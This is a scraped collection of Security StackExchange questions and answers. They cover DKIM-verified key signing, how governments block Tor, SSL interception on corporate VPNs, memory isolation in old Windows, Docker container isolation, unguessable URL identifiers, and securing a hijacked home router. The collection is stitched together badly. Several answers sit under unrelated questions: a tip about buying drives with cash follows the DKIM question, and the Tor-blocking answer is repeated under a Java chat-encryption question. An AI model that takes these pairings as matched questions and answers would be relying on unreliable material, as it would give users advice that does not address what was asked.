It occurred to me that DKIM verified emails, from major players (e.g., GMail), could open the door to more modern OpenPGP robot key signing authorities . The idea would be to ask people to send a key singing request to a known address (e.g., [email protected]), and to sign their request with their OpenPGP key. The DKIM signature of that email would then be checked so as to verify that the requester has control over the claimed account (i.e., that GMail, for example, asserts that the email was sent by a valid / authenticated user). If everything checks out, the bot would sign the corresponding identity in the sender's public key, and send it back. My understanding is that DKIM makes it much more difficult to spoof an email address when the "From: " header is included in the DKIM signature. So, I ask the community here, what are some weaknesses or limitations of this approach? Here are some of the issues that I've considered: In the past, DKIM keys were much too short (< 1024 bit RSA). This has been resolved. DKIM public keys are hosted as DNS records, and plain-old DNS can be spoofed (perhaps pinning can be used for major players) DKIM keys are perhaps less protected than other security credentials, as their primary purpose is to combat spam and phising (no solution?). Are there other dangers I'm overlooking? NOTE: For what it's worth, it would appear that keybase.io is toying with this idea ( https://github.com/keybase/keybase-issues/issues/373 )
If you don't want to be at risk, in the future get a third party to purchase stuff like this in cash, from a store not near your house or work. You should see if you can download firmware for the drive from the manufacturer's site. Update the firmware on the drive, or at least check its signature. Remember, it is near Christmas and shipping is likely to take longer than normal.
{ "source": [ "https://security.stackexchange.com/questions/107417", "https://security.stackexchange.com", "https://security.stackexchange.com/users/93809/" ] }
107,490
I came across this article saying that after the November 2015 Paris attacks , some French police officers proposed to ban Tor. Tor is used to circumvent censorship! What security techniques would governments use to block Tor?
In order to block Tor, all that has to be done is have the current list of Tor nodes which can be found at the following link: http://torstatus.blutmagie.de/ip_list_all.php/Tor_ip_list_ALL.csv and then block them bi-directionally via the Routers or Firewalls. That said there will be numerous ways around such efforts, people can still use VPNs to connect outside of a given area and then run the Tor traffic from another location or tunnel the traffic through, but this will effectively block many of the less technical people from accessing Tor. Similarly, the following list of Tor exit nodes could be useful for blocking Tor traffic from connecting to any given websites: https://check.torproject.org/exit-addresses I would say it's easy to make Tor hard to use but that it's extremely hard to make it impossible to use. Keep in mind that governments with large financial resources can spend money to run tools like ZMAP.io to find potential Tor servers, including Tor Bridges, minutes after they are started. Continuously scanning the entire IPv4 address space has become trivial for those with even a small budget so a campaign to find and block Tor nodes could easily be very effective, but it will never be absolute. Finally, keep in mind that once Tor users have been identified the government would likely monitor future connections by that user to locate new Tor bridges or similar connections. Note: The task of scanning IPv4 has become trivial but the process for scanning all of the public IPv6 address space would be radically unmanageable due to the scale. That said a large government project correlating other types of data such as Netflow, some type of traffic signatures, or some other form of identification would be required to identify and block Tor traffic on IPv6 networks. Again governments can make Tor hard to use but that it's extremely hard to make it impossible to use. It should be further noted that governments also leverage additional tactics to identify anonymous users. To protect end-users from risks related to cookies or other signatures which may give away additional information about Tor users it may be wise to use an anonymous live CD such as the following: https://www.whonix.org/ https://tails.boum.org/ Torflow visualization may also be of interest: https://torflow.uncharted.software Related article: 81% of Tor Users Can be Easily Unmasked By Analyzing Router Information http://thehackernews.com/2014/11/81-of-tor-users-can-be-easily-unmasked_18.html Another related article about a much more dangerous but related issue: Tor Browser Exposed https://hackernoon.com/tor-browser-exposed-anti-privacy-implantation-at-mass-scale-bd68e9eb1e95
{ "source": [ "https://security.stackexchange.com/questions/107490", "https://security.stackexchange.com", "https://security.stackexchange.com/users/93895/" ] }
107,506
I have a chat application built in Java. The chat app stores a log of the user Jimmy's chats locally on his machine. I want this chat log to be encrypted so if someone uses the computer (authorized or unauthorized) he cannot simply read all of Jimmy's chats. I would like Jimmy's chats to only be readable when Jimmy is logged in. As soon as he logs out, the chats should be encrypted and unreadable. Any ideas on how this sort of scheme could be implemented?
In order to block Tor, all that has to be done is have the current list of Tor nodes which can be found at the following link: http://torstatus.blutmagie.de/ip_list_all.php/Tor_ip_list_ALL.csv and then block them bi-directionally via the Routers or Firewalls. That said there will be numerous ways around such efforts, people can still use VPNs to connect outside of a given area and then run the Tor traffic from another location or tunnel the traffic through, but this will effectively block many of the less technical people from accessing Tor. Similarly, the following list of Tor exit nodes could be useful for blocking Tor traffic from connecting to any given websites: https://check.torproject.org/exit-addresses I would say it's easy to make Tor hard to use but that it's extremely hard to make it impossible to use. Keep in mind that governments with large financial resources can spend money to run tools like ZMAP.io to find potential Tor servers, including Tor Bridges, minutes after they are started. Continuously scanning the entire IPv4 address space has become trivial for those with even a small budget so a campaign to find and block Tor nodes could easily be very effective, but it will never be absolute. Finally, keep in mind that once Tor users have been identified the government would likely monitor future connections by that user to locate new Tor bridges or similar connections. Note: The task of scanning IPv4 has become trivial but the process for scanning all of the public IPv6 address space would be radically unmanageable due to the scale. That said a large government project correlating other types of data such as Netflow, some type of traffic signatures, or some other form of identification would be required to identify and block Tor traffic on IPv6 networks. Again governments can make Tor hard to use but that it's extremely hard to make it impossible to use. It should be further noted that governments also leverage additional tactics to identify anonymous users. To protect end-users from risks related to cookies or other signatures which may give away additional information about Tor users it may be wise to use an anonymous live CD such as the following: https://www.whonix.org/ https://tails.boum.org/ Torflow visualization may also be of interest: https://torflow.uncharted.software Related article: 81% of Tor Users Can be Easily Unmasked By Analyzing Router Information http://thehackernews.com/2014/11/81-of-tor-users-can-be-easily-unmasked_18.html Another related article about a much more dangerous but related issue: Tor Browser Exposed https://hackernoon.com/tor-browser-exposed-anti-privacy-implantation-at-mass-scale-bd68e9eb1e95
{ "source": [ "https://security.stackexchange.com/questions/107506", "https://security.stackexchange.com", "https://security.stackexchange.com/users/90688/" ] }
107,542
My company has just introduced a new VPN policy whereby once connected all traffic is routed the company network. This is to allow for improved monitoring of data theft. It would appear that this policy also performs a man in the middle attack on HTTPS traffic. What this practically means for me is visiting " https://google.com " will give me a certificate error. Upon inspection of the certificate it is signed by my company's (self-signed) certificate. To me this is hurting security in one area to help it in another. Is this common practice in big companies? Can someone point me to an ISO standard?
Is this common practice in big companies? Yes. The feature is available in most enterprise firewalls and also several firewalls for smaller companies. It is even available in the free web proxy Squid . And several personal firewalls have implemented it too. As more and more sites, (both harmless and harmful), move to https:// , expect that the usage of SSL interception will increase too, because nobody likes to have a firewall which fails to protect a system because it is blind regarding encrypted traffic. Can someone point me to an ISO standard? SSL interception just makes use of the existing SSL and PKI standards. There is no need to have a new standard which defines how SSL interception works. As for the Cyber Security Standards : I'm not aware of any which explicitly require SSL interception, but I don't have much knowledge of these kind of standards. But even if it is not explicitly required it might be implicitly expected that you either block access to a SSL site or do SSL interception when the standard demands traffic monitoring. will give me a certificate error. SSL interception needs you to trust the intercepting CA. In most companies these CA certificates are centrally managed and installed on all computers, but if you use a browser like Firefox it might not help because Firefox has its own CA store and does not use the systems CA store. To me this is hurting security in one area to help it in another. Yes, it is breaking end-to-end encryption to detect malware and data leakage which use encrypted connections. But since the breakage of end-to-end encryption is done in full control of the company and you still have encryption to the outside world this is a trade off most companies are willing to take. But note that in the past bugs were detected in several SSL interception products (like same CA between different companies, no revocation checks...) which additionally weakened the security.
{ "source": [ "https://security.stackexchange.com/questions/107542", "https://security.stackexchange.com", "https://security.stackexchange.com/users/1363/" ] }
107,546
In his book Security Engineering, Anderson really focuses on how in the 90s and early 2000s programs would need to access memory that wasn't their own, and programmers programmed with the assumption the program would be run with administrative privileges: The latest Microsoft system, Vista, is trying to move away from running all code with administrator privilege, and these three modern techniques are each, independently, trying to achieve the same thing — to get us back where we'd be if all applications had to run with user privileges rather than as the administrator. That is more or less where computing was in the 1970s, when people ran their code as unprivileged processes on time-shared minicomputers and mainframes. Only time will tell whether we can recapture the lost Eden of order and control ... , and to escape the messy reality of today... but certainly the attempt is worth making. In particular this quote PCs carry an unfortunate legacy, in that the old single-user operating systems such as DOS and Win95/98 let any process modify any data; as a result many applications won’t run unless they are run with administrator privileges and thus given access to the whole machine Does this mean that ideas such as these , where you can assign any address to a pointer and have access to the memory would work on Windows 95/98? Why would they design it this way as what would be the benefit of reading some other programs memory (or writing to it!)? int * firefoxmemory = (char*) 0x11111111 //this is just an example of address. *firefoxmemory = 200;//screw firefox
Memory isolation Your example wouldn't work on Windows 95, but it did work on DOS and Windows up to 3.11 (not Windows NT). The PC architecture, and the Microsoft series of operating systems, started with the Intel 8086 processor and an operating system ( DOS ) designed to run a single program at a time. You would run a program, and when you were finished with it, you'd exit it, so the overwriting data of another process wasn't really a concern. (You could have programs that remained in memory after exiting ; they were essentially part of the operating system.) The Intel 80386 processor changed the deal by being the first of its lineage to have a memory management unit (MMU) . An MMU is a hardware component that provides virtual memory by translating virtual addresses (pointers in a program) to physical addresses (actual locations in RAM¹). Windows 95 was the first in its lineage to take advantage of it: each Windows 95 application ran with its own MMU configuration, so that *firefoxmemory would either point into the program's own address space (in which case whatever bad thing it did could only affect that program) or not point anywhere at all (in which case the program — and not the whole system — would crash). Windows 3.0–3.11 took advantage of some of the 386's novelties, but they ran all applications in the same address space. This was due to several factors: a requirement to keep old Windows 1.x/2.x applications running (they were designed to run on single-address-space hardware, and many took advantage of that to poke into OS internals to achieve things that weren't possible through documented interfaces); lack of development time to redesign the whole operating system based on a completely different architecture; a requirement to run on computers that had little RAM: keeping applications isolated does cost more memory on a scale of 2 MB or 4 MB (because data has to be copied between programs, and because the operating system has to keep track of all program interactions to allow applications to communicate and to regulate the communication). It wasn't so much that the operating system was explicitly designed to allow programs to access each other's memory, but that there was no way to prevent it. When ways to prevent it became affordable, it took a few OS versions to take advantage of them. For example, let's consider a feature such as inter-program copy-paste (clipboard). If you don't have memory isolation, this can be implemented by having the source program keep a copy of the data in its own memory; when the data is pasted in another program, that other program copies the data directly from the source program. The only thing the operating system needs to track is who currently owns the clipboard. If applications' memory is isolated, the operating system needs to arrange for the data copying, and possibly to store a copy of the data independently of the source application. This requires more development work to write this code, and more resources to store this code in memory and run it. I've simplified a number of things here; for more about how an operating system uses an MMU to isolate applications, you can read How the kernel can prevent a malicious program to operate? , How can two identical virtual addresses point to different physical addresses? , Is it possible to support multiple processes without support for Virtual memory? (they're Unix-oriented but the principles apply to Windows or any OS you're likely to encounter on a PC). Privilege isolation In this passage, Anderson isn't actually discussion memory isolation, but privilege isolation, where a running program is prevented from affecting certain parts of the system. Memory isolation is necessary, but not sufficient. The operating system must also control the ways processes interact, control what files they open, etc. Even with each application running in its own memory space, applications can interact. Memory isolation merely forces applications to use operating system services (via system calls to a kernel which can access all memory) to interact. The Windows 1.x/3.x/9x/ME series of operating system was designed as a single-user operating system and did not isolate applications. Memory isolation was added in Windows 95, but only to improve stability, not to implement security restrictions. These operating systems have no security restrictions: if you ran a program on your machine, it is allowed to do everything. (This is of course helpful to virus writers.) The memory space is isolated, but not the file space. The Windows NT/2000/XP/… series of operating systems, like operating systems in the Unix family, was designed as a multi-user operating system, which introduces a basic security goal: what a user does should not adversely affect what other users can do. So the operating system has to enforce, for example, that programs executed by Alice cannot interact with programs executed by Bob, cannot modify Bob's files, etc. Programs and data that are part of the operating system concern every user and so should be protected from all users. (Of course, some interactions are allowed by explicit permission, e.g. a network server does process requests that it receives from the network, Bob can change a file's permissions to be writable by others, some users are granted administrative privileges and so can modify the operating system, etc.) A great many applications were written to target Windows 9x, which had no security restrictions. So they took liberties such as writing to the operating system directory (under Windows 95, copying the file to the Windows directory was the normal way to install a shared library). Much of what these applications do was considered somewhat messy even by the standards of that time, but it worked so people did it. Versions of Windows from the NT series (which includes all versions since XP) necessarily broke some of these applications, though Microsoft did add a number of workarounds (such as pretending that writing a file to a shared directory succeeded, but actually writing it to a user-specific directory). Windows XP enforced user isolation, but most installations wouldn't take advantage of it: many installations just had the user be an administrator, so all the programs they ran had the privileges to do pretty much anything. There were two main reasons for that: It allows badly-behaved legacy applications to run. While most such applications are only used by a small proportion of users, many users do run such applications and it takes a long time and a huge effort to renew them all. Introducing privileges means that sometimes the user will be told that something can't be done because of a lack of privileges. Witness the complaints about Vista, that it would keep showing those privilege escalation prompts. Application isolation If you're young enough to have discovered computers through portable devices, you may be used to a model of isolation centered on applications, rather than users. In the Unix and Windows model, Alice's data is protected from Bob. Applications are neutral in the security model: they just execute under the identity of the logged-in user. This means that the application code has to be trusted not to misbehave. Windows has traditionally coped with misbehaving applications by trying to detect and contain them through antivirus software . That doesn't work too well. Unix systems, especially Linux, tend to cope by distributing more software through traceable channels from which malware is eliminated. Operating systems designed for mobile devices, in particular iOS and Android, don't trust application developers, so applications are isolated; for example each application has its own file space. This has a security benefit, but also a significant cost in that it reduces what applications can do. Applications require privileges to modify operating system behavior (e.g. to create shortcuts and more generally automation), you can't easily manipulate the same file in different applications, you can't easily allow multiple applications to display information at the same time, etc. Or, to take a more dramatic example, you can't write a debugger with restricted privileges, because the whole point of a debugger is to snoop on and perturb the execution of the application that's being debugged. This cost is why the mobile application isolation model can't just be grafted onto a PC environment.
{ "source": [ "https://security.stackexchange.com/questions/107546", "https://security.stackexchange.com", "https://security.stackexchange.com/users/10714/" ] }
107,648
Yesterday I found a spam mail in my inbox. I inspected it in order to find out why DSpam and SpamAssasin failed. You can find the raw German mail here , here's a translation: Good Morning. We got to know each other on the website of acquaintances. I want to continue communicating with you, that's why I sent you my picture. I live in RU, the distance is no problem for me. We can communicate us. How old are you? Write me please and send me your photo. I'll be waiting. The text has poor grammar and lacks any German umlauts. What actually made me wonder was the purpose of the mail. Usually a spammer wants you to click a link or something, probably to infect one's PC or verify an active mail at least. Why would a spammer want to know my age and a picture of mine?
There was a psychology experiment where two groups of homeowners went door-to-door and asked, ironically, for people to consent to display a large and ugly sign in their yard that said some form of, "Keep America beautiful." What distinguished how the two experimental groups were treated was that one group was asked beforehand to agree to display an index card in their front window with the same theme. Almost everybody agreed to display the index card. Agreeing to display the index card had a notable effect. People who were asked up front to display the sign in their yard usually refused (about 30% of them agreed). People who had displayed the index card usually agreed (about 70% of them agreed). The point made in reference to this experiment has been called the " foot in the door effect ." Agree to something little, and you are much more likely to agree to much more. Add in this case that if someone is trusting, and perhaps like many people online a little lonely, sending a picture may not seem too much to ask. And you have a foot in the door opening up to problems much worse than mishandling of the German language.
{ "source": [ "https://security.stackexchange.com/questions/107648", "https://security.stackexchange.com", "https://security.stackexchange.com/users/77472/" ] }
107,753
One of my neighbours hacked the password of my router and he uses my limited internet package. I change the wifi SSID almost daily, but he can hack it easily. Today, he changed the SSID to a hate speech "insult". How can I stop him? I need a quick and powerful solution. Is there any easy-to-use software that protects my wifi? I have an idea but I don't know how to do it. Sometimes my mobile (smart phone) finds a wifi network that does not have a password. So, I can connect to it easily. When I access the internet, all websites are unavailable. And I can not surf any webpage. How to do something like that? Edit: I'm Using WPA/WPA2 PSK
There are two different passwords that access different functions. If an attacker has the admin password, then he / she can change the SSID, WiFi password, and any other settings on the WiFi router. To fix: ensure your WiFi security setting is WPA or WPA2. Then change the WiFi password to a long one (at least 12 characters, more is better) with special characters and numbers (such as #, $ %, !, 1, 6, see for example Is there any point in using 'strong' passwords? ). Also, make sure the admin password on the WiFi router is changed from the factory default. This admin password is different than the WiFi password. It should also be a long complicated password, but do NOT make it the same as the WiFi password. The WiFi password is the one you give to friends and family to access your WiFi. The admin password should be kept with you only, or people you REALLY trust, as it can be used to change WiFi settings. Once this is done, change the SSID back to one you like. Also, make sure to disable the feature called Wi-Fi Protected Setup (WPS). See http://www.howtogeek.com/176124/wi-fi-protected-setup-wps-is-insecure-heres-why-you-should-disable-it/ for details on why WPS is not recommended. If the attacker is still able to change the SSID and any passwords, your system is more deeply compromised and I would recommend contacting a computer expert or store who can help you clean your system. They can also give you advice on if there is anything local law enforcement can do, as your attacker is likely committing a crime.
{ "source": [ "https://security.stackexchange.com/questions/107753", "https://security.stackexchange.com", "https://security.stackexchange.com/users/94156/" ] }
107,811
I just started reading about cookies and all the ways I can get them wrong and allow cookies to be hijacked which allows attackers to do things like impersonate a logged in user. I don't understand why this can't be solved by simply having the server add to each cookie a signature determined by the rest of the cookie, a secret key on the server, and the IP of whoever is making the request. Stolen cookies would then be mostly useless for anyone who can't receive a response at that IP. Any readable data in a stolen cookie itself could still be accessed but stolen cookies couldn't be used to impersonate someone else. Why doesn't this work? Is there some way to receive packets bound for an IP address that you don't control? I know that on my local network I can read packets meant for other computers on my local network but I don't think there's any way to send a copy of all the packets meant for stackoverflow.com to my residential IP. If this was our only means of security you could still send spoofed requests but you couldn't trick the server into sending anything back to your own IP (I think) which still seems useful. I didn't find anything about associating cookies with IPs on google so I figure this doesn't work but I don't know why.
If the cookie gets stolen inside a public Wifi Hotspot all users of the Hotspot have usually the same public IP address. This means binding to an IP would not help against an attacker in the same local network. Apart from that if the public IP of users changes like it is the case with moving between networks (Mobile, WLAN university, WLAN at cafe, WLAN at home...) they would need to login again and again.
{ "source": [ "https://security.stackexchange.com/questions/107811", "https://security.stackexchange.com", "https://security.stackexchange.com/users/45880/" ] }
107,850
I have created a web application that among other things allows users to write, compile and execute code (Java, C#). The application creates a Docker container for every user where compilation and code execution takes place. I have taken the following measures to secure the container: This container has no persistent or shared data. It does not have access to the docker API (which is secured with TLS). There is no information within the container the user shouldn't know about. The user will not be aware that the compiler is within a container. Can I consider this container safe to run untrusted code in? Are there any known ways to affect the host machine from within the container in a configuration like this?
tl;dr : container solutions do not and never will do guarantee to provide complete isolation, use virtualization instead if you require this. Bottom up and top down approaches Docker (and the same applies to similar container solutions) does not guarantee complete isolation and should not be confused with virtualization. Isolation of containers is achieved through adding some barriers in-between them, but they still use shared resources as the kernel. Virtualization on the other hand has much smaller shared resources, which are easier to understand and well-tested by now, often enriched by hardware features to restrict access. Docker itself describes this in their Docker security article as One primary risk with running Docker containers is that the default set of capabilities and mounts given to a container may provide incomplete isolation, either independently, or when used in combination with kernel vulnerabilities. Consider virtualization as a top-down approach For virtualization, you start with pretty much complete isolation and provide some well-guarded, well-described interfaces; this means you can be rather sure breaking out of a virtual machine is hard. The kernel is not shared, if you have some kernel exploit allowing you to escape from user restrictions, the hypervisor is till in-between you and other virtual machines. This does not imply perfect isolation. Again and again, hypervisor issues are found, but most of them are very complicated attacks with limited scope that are hard to perform (but there are also very critical, "easy to exploit" ones. Containers on the other hand are bottom-up With containers, you start from running applications on the same kernel, but add up barriers (kernel namespaces, cgroups, ...) to better isolate them. While this provides some advantages as lower overhead, it is much more difficult to "be sure" not having forgotten anything, the Linux Kernel is a very large and complex piece of software. And the kernel itself is still shared, if there is an exploit in the kernel, chances are high you can escape to the host (and/or other containers). Users inside and outside containers Especially pre- Docker 1.9 which should get user namespaces pretty much means "container root also has host root privileges" as soon as another missing barrier in the Docker machine (or kernel exploit) is found. There have been such issues before , you should expect more to come and Docker recommends that you take care of running your processes inside the containers as non-privileged users (i.e., non-root). If you're interested in more details, estep posted a good article on http://integratedcode.us explaining user namespaces . Restricting root access (for example, by enforcing a non-privileged user when creating the image or at least using the new user namespaces) is a necessary and basic security measure for providing isolation, and might give satisfying isolation in-between containers. Using restricted users and user namespaces, escaping to the host gets much harder, but still you shouldn't be sure there is just another way not considered yet to break out of a container (and if this includes exploiting an unpatched security issue in the kernel), and shouldn't be used to run untrusted code.
{ "source": [ "https://security.stackexchange.com/questions/107850", "https://security.stackexchange.com", "https://security.stackexchange.com/users/94278/" ] }
107,852
Sometimes, security best practices protect you against attacks that are very improbable. In these scenarios, how do you defend the implementation of such security measures? For example, password-protecting access to the BIOS of a thinclient. A BIOS without a password is a risk because an attacker with physical access can change BIOS configuration in order to boot from USB and access the data of the system without authentication. In this case, the attacker needs physical access, the thinclient does not store too much important information, etc. The risk is very low. Other examples may be related to some measures when you harden systems. In this case, is it better to not enforce this security measure to be reasonable with the rest of the company or you are opening little holes that will punch you in the face in the future?
The potential impact of this is not low, regardless of how much information the thin client stores. Specifically the risk is that an attacker installs something like a rootkit or software keylogger in the operating system of the thin client, which you are unlikely to be able to discover by inspection. (This is a variant of the Evil Maid attack). Should any administrator ever use that client in the future, it will be game over for the network. The thin client can also be used as a beachhead to launch further attacks against the network, or to conduct reconnaisance. Protecting the BIOS prevents this from happening, by protecting the integrity of the thin client OS. The wider lesson here: Best practice saves you the expense and difficulty of assessing every risk, which as this question demonstrates, is hard to do.
{ "source": [ "https://security.stackexchange.com/questions/107852", "https://security.stackexchange.com", "https://security.stackexchange.com/users/91253/" ] }
107,887
Once a *nix system is properly configured and hardened, is it a conceivable strategy to remove all super user/root users? Are there benefits to removing root from a system altogether to prevent super-user privilege escalation exploits altogether? Edit: More to the point: Can super user (root, uid=0 or otherwise) be replaced entirely with a capability based system?
Even if you wanted to, I don't think you can remove the root user. From Wikipedia : On Unix-like systems, for example, the user with a user identifier (UID) of zero is the superuser, regardless of the name of that account. and a lot of the kernel code that vulnerabilities exploit does stuff like // become root uid = 0; ... if (uid == 0) // do some protected thing So the superuser isn't really a "user account", it's literally the number 0. If you can find an exploit to set uid = 0 then bam! your process has sudo , regardless of whether or not there's a user account named "root". EDIT ADDRESSING COMMENTS: several flavours of linux prepend a "!" to the root's password in the /etc/shadow password file (a character that can not be generated with the password hashing function) which makes it impossible to actually log in as root. That stops some types of root-priviledge escalation attacks based on cracking the root password, but the more dangerous kind of privilege-escalations are based on buffer-overflow attacks that over-write a process' uid variable to be uid=0 , at which point that process is root .
{ "source": [ "https://security.stackexchange.com/questions/107887", "https://security.stackexchange.com", "https://security.stackexchange.com/users/91764/" ] }
108,028
Let's say I operate a website where you can create cat pictures. I give every cat picture a unique identifier so that it can be shared on social media with http://catpictures.com/base62Identifier . I could give the cat pictures sequential identifiers such as 1,2,3, etc, but then it would be possible to easily discover how many new cat pictures the users create per day (by the largest identifier that returns HTTP 200 each day). This exposes me to the common strategy of ordering a product from your competitors once a month and noting the invoice number. Website traffic figures are well-correlated to business revenue so I obviously want to keep this information secret. What I'm considering trying: This sounds like a job for a hashing algorithm, right? The trouble is by observing a hash it's pretty easy to tell which algorithm created it (md5, crc32, etc). Someone with a rainbow table would make short work of that idea. I could salt the identifier [hash("salt"+1), hash("salt"+2), ...], but would then have to worry about the security associated with the salt. And collision checking. Another idea I had was to generate a random string of characters and use that as the cat picture's primary key in the database (or just I could hash the first n bits of the cat picture data). This way I would only have to check for collisions. Is there a standard, best-practice way avoiding exposing your traffic volumes through your unique identifier URLs? Edit: I'm specifically looking for a solution that is a good combination of security and suitability as a database primary key or indexable column.
The standard approach to this kind of issue is to create a UUID (Universally Unique Identifier) for each picture. This is generally a random 128-bit identifier which you can assign to each picture without any particular concern that it would be possible to enumerate the pictures via a brute-force attack on the namespace. For example in .NET you can use the GUID structure for this kind of purpose. Since Windows 2000 ( source ), Guid.NewGuid generates random (version 4) UUID. (Ancient versions generated a version 1 UUID which reveals the date when it was generated, doing nothing to protect you from the "invoice number" problem.)
{ "source": [ "https://security.stackexchange.com/questions/108028", "https://security.stackexchange.com", "https://security.stackexchange.com/users/63796/" ] }
108,055
Edit: This scheme has since been standardised as WebAuthn - go use that instead! I have a userbase which really isn't all that inclined to create a secure password for a website. They're also almost entirely on mobile devices, so I would like to try something a little different rather than them type 'password1' and just wait for it to get guessed. So, firstly, some assumptions: Web browsers almost always remember the password for you anyway. Mobile devices are increasingly gaining features which identify a particular user more securely (touch ID, for example). This uses HTTPS; Malicious clients (intercepting) are largely a non-issue. The resulting implication: The website authenticates the device and the device authenticates the user. Therefore, we might as well use something better than a poorly chosen password for website <-> device. Given this, the intention is to use a client generated key pair. The most similar thing asked before is Using RSA for Web Application Authentication , however this approach appears to be a little different. So, the protocol itself. Firstly, the join process: The client generates an RSA key pair. The public key is sent to the server (over HTTPS). This only ever happens once per device. The server stores the public key as a device. The server creates an account and relates the device to the account. [A] The first session token along with the new device ID is encrypted using the public key, and the result is sent back to the client. The device ID is both a number and a randomly generated string. The client decrypts it, stores the device ID and the private key, and sets the IP locked session token as its cookie. All further requests are authenticated using the session token. Login (typically due to changed IP) The client tells the server which device it is by sending the device ID. The server asks the client to prove it by encrypting the new session token with its stored public key of that device, and sending it. The client decrypts the data and sets the session as it's cookie. Provided it really is who it said it was, the session is now valid. Adding a device to an account (e.g. a new phone to replace the one you just washed): The device gets a device ID for itself by doing a join similar to above but does not create an account; [A] does not occur. The device is currently able to authenticate but is not associated with any account. (And this association is purely at the server end). Enter your email address (or some other account related information such as a username) on the new device. The server identifies the requested account and sends it an email or SMS containing a link. The user loads the link (on any device). This causes the server to relate the new device to the original account, provided it's within e.g. 24 hours. Known vulnerabilities: The following vulnerabilities all also relate to your typical password system. It's as strong as the email account/ SMS receiver etc. SSLStrip and XSS being used to grab the stored private key, in the same way they could grab document.cookie or the autofilled user/password fields. Although the whole site is HTTPS only, there may be some unknown exploit with the surrounding infrastructure. Someone else could grab the physical device and use the site. Benefits over a password system: The 'password' is private, even from the server, helping against data leaks and MITM. The 'password' text is considerably stronger as it's essentially equivalent to one in the region of 300-500 characters long. The server only contains a list of public keys. Someone gaining this list via a data leak would still have to break RSA. It's unphishable as the user never directly enters a password. If an intruder breaks HTTPS, i.e. by going around it with something like SSLStrip, they'd still have to break the password as it's not then on the wire as clear text. Actually simpler to use; the user simply enters, at a minimum, an email address. Given this, my assumption is that such a system may provide more security and simplicity than a password one can. However, why is this not being done, and, should it be done; am I missing something? Or should I stick to the mainstream password setup and just live with it - any responses would be greatly appreciated! Side notes I'm aware of client certificates which this has parallels to, but they seem to use complicated terminology and UX for a user to understand, thus they doesn't get used all that much. On a similar thread then, it may make a user feel odd not using a password; it may be perceived to be less secure. (?) Provided the technique is sound and the 'perception issue' isn't a concern, I intend to opensource the implemented solution for both greater security/ simplicity on the web with a corresponding full audit of the implementation.
The standard approach to this kind of issue is to create a UUID (Universally Unique Identifier) for each picture. This is generally a random 128-bit identifier which you can assign to each picture without any particular concern that it would be possible to enumerate the pictures via a brute-force attack on the namespace. For example in .NET you can use the GUID structure for this kind of purpose. Since Windows 2000 ( source ), Guid.NewGuid generates random (version 4) UUID. (Ancient versions generated a version 1 UUID which reveals the date when it was generated, doing nothing to protect you from the "invoice number" problem.)
{ "source": [ "https://security.stackexchange.com/questions/108055", "https://security.stackexchange.com", "https://security.stackexchange.com/users/94449/" ] }
108,104
I live in a country with little freedom on the Internet (not as strict as in China, but some sites, particularly anti-government sites are inaccessible without a VPN). Recently the government just went collecting the Wi-Fi names of every house. I had to fill in my name, my address and my Wi-Fi name. I didn't have to to provide the password. Every house needed to fill in the survey. They refused to tell the reason. My questions are: Why would they do that? If I can change my Wi-Fi name, or even the modem, whenever I want, then why would they do that? Should I do that right now? To my knowledge*, once the password is passed, changing new password on the same modem won't help. However, I'm not sure that after they have gained the access on my modem, what can they do? Can they open the backdoor or something? *I used to install Kali to break Wi-Fi passwords for fun, but unfortunately I didn't pass the first test of the tutorial. :( After I found out that all tutorials only give me a part of solution, I was lazy to try again.
I see two possible uses of such information from a government perspective. None of them involves the password or actually using your WiFi access. Forensic analysis: connected devices store an history of access points they were connected to, sometimes associated with "last seen" dates. Using this history, it is therefore possible to know where someone was and when, which can be very helpful for investigators. Concrete example : someone is arrested, his cellphone and laptops are seized for investigation, and their WiFi history is analysed (actually, in some cases, with some devices being a bit too talkative, it is not even needed to actually seize the device, but let's stay on topic). This will reveal where the suspect has been and when (for the last time at least), and because we are talking about associated access points it strongly leads toward some sort of relationship between the suspect and the AP owner (you do not distribute your WiFi password to any strangers, do you?), helping to construct a map of the suspect relationships (here having the ability to associate an SSID (the WiFi name) to an owner name takes all his importance). Geolocation: If by any means investigators can remotely access the list of the access points covering the area where a device is currently located, then it is possible to determine where the device (and most likely its bearer too) is located. Concrete example : An implant (to borrow NSA's terminology) is installed on a device with Internet but no GPS capability (laptop, tablet, etc.) or where the user has disabled GPS geolocation for privacy purposes. The implant phones home on a regular basis, sending a list of currently visible WiFi networks with the associated signal strength (the device doesn't need to be associated to any of them). Associated to a map of SSID geographical locations, this effectively allows to track in real time the suspect's movements. In this case however, collecting the owner's name in such visible actions is less needed, war drivers and other Google cars know this very well. However depending on the details of this procedure it may also limit the possibilities for people to freely change their WiFi SSID name (let's say the form forbid this, it would be trivial for the authorities to detect undeclared changes and associate it to a name), thus possibly providing more accurate information on the long-term. Regarding your mention about the WiFi password, as long as the WiFi access has been hacked by finding the password and not due to another unrelated weakness and unless the attacker also hacked the access point itself (and replaced its firmware for instance), then changing the password by a stronger one is sufficient to block any further exploitation of this access. Regarding what can be done using a compromised access point, this is worth a separate question but you may already find a lot of information in already existing posts on this site (basically an attacker would gain a Man-in-the-middle (MiTM) position to intercept/modify all of your communication, this also opens opportunities to attack other devices of your internal network, and depending on the device's reset abilities the attacker could also prevent the access point firmware from being cleaned, effectively requiring the device to be replaced). And yes technically you could change your WiFi "name" any time you want, however it is possible that your government may request you to fill a form to officially declare this change (or they just assume that only a minority of users will do this so it does not worth to track such changes).
{ "source": [ "https://security.stackexchange.com/questions/108104", "https://security.stackexchange.com", "https://security.stackexchange.com/users/94500/" ] }
108,191
Entering my email at https://haveibeenpwned.com/ , I was told that I have been pwned. I am in http://pastebin.com/SCLNRHJQ I already tried to find out my password by simply md5-hashing all my passwords I could think off and comparing them to the hash in pass to check whether someone could easily crack my password by putting the hash into some online md5 "rainbow table service" myself. to find the breached web site by searching my mail for registration notifications received on the registration date given in joined_on to find email received from any mail address in the list. to send an email to the first in the list, asking him whether he knows which site it is and/or whether he possibly is the owner of that site. All of these loose ends came up blank. I could only deduce that it has to be a really small LEGO-themed website, but that's it. So I have changed all my passwords of my most-used accounts, especially the email accounts. The many old and sleeping accounts I don't know that I have, they are out of reach. What else can I do?
The first rule is to clean up your act: use a password manager and have unique , long and random password for EACH and ALL your important services (email, google, etc.) and change all your passwords. Then check if there are some mysterious transactions made on your accounts (not specifically bank accounts, mind you: anything that could be accessed using the email that was compromised). That should give you a good indication if the possible risk of being breached was realized. Finally, take each possibly compromised account and think of how it could lead to a continuing issue: could some information extracted from that account be used in the future ? If yes, is there any action you might take to reduce the consequences ? Is the risk you're running worth the price you're going to pay to mitigate it ? If you can't mitigate it, can you ensure it ? Is it even worth insuring ?
